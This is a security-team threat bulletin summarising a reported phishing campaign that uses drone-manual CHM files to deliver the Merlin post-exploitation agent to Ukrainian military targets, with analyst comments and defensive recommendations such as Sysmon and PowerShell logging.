Cyber Security Threat Summary:
“Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. ‘Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News. The cybersecurity company is tracking the campaign under the name STARK#VORTEX. The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary. The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.

Security Officer Comments:
Merlin has been used in the past to target Ukrainian government organizations. For instance just last month, Ukraine’s Computer Emergency Response Team disclosed a similar attack chain that employs CHM files as decoys to infect computers with the open-source tool. For its part, Merlin comes with a wide range of capabilities, making it a popular alternative to post-exploitation tools like Cobalt Strike and Sliver. Some of the capabilities of Merlin include:

• Encrypted C2 communication using TLS
• Remote command shell
• Module support (such as Mimikatz)
• Binary support for exe or dll clients

Suggested Correction(s):
Always be extra cautious downloading file attachments from posts for private messages. When it comes to prevention and detection, the Securonix Threat Research Team recommends:

• Avoid downloading files or attachments from untrusted sources, especially if the source was unsolicited
• Monitor common malware staging directories, especially “C:\ProgramData” and other temporary locations such as the user’s local appdata folder which was used in this attack campaign
• Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage

Link(s):
https://www.securonix.com/blog/
https://thehackernews.com/2023/09/ukrainian-military-targeted-in-phishing.html